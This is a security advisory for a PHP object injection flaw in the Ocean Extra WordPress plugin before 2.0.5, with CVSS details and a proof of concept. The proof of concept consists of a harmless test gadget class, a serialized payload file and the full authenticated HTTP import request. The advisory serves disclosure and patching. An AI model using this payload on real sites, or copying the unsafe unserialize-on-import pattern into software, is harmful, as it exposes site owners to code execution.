Ocean Extra < 2.0.5 - Admin+ PHP Objection Injection

2022-10-1000:00:00

Nguyen Duy Quoc Khanh

165

7.2 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

JSON

The plugin unserialises the content of an imported file, which could lead to PHP object injections issues when a high privilege user import (intentionally or not) a malicious Customizer Styling file and a suitable gadget chain is present on the blog.

To simulate a gadget chain, put the following code in a plugin

class Evil {
  public function __wakeup() : void {
    die("Arbitrary deserialization");
  }
}

Create a file named import.dat with the following content: O:4:"Evil":0:{};

Import the file via the "Import Customizer Styling" feature in Appearance > OceanWP > Customizer (requires the OceanWP theme to be active)

The view the response of the import request made, which will have the "Arbitrary deserialization" message

POST /wp-admin/admin-ajax.php?_fs_blog_admin=true HTTP/1.1
Accept: */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/admin.php?page=oceanwp
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------371888087213614698033751989022
Content-Length: 542
Connection: close
Cookie: [admin+]

-----------------------------371888087213614698033751989022
Content-Disposition: form-data; name="file"; filename="localhost-wordpress-oceanwp-export.dat"
Content-Type: application/octet-stream

O:4:"Evil":0:{};
-----------------------------371888087213614698033751989022
Content-Disposition: form-data; name="action"

oceanwp_cp_customizer_import
-----------------------------371888087213614698033751989022
Content-Disposition: form-data; name="_nonce"

166c9022e0
-----------------------------371888087213614698033751989022--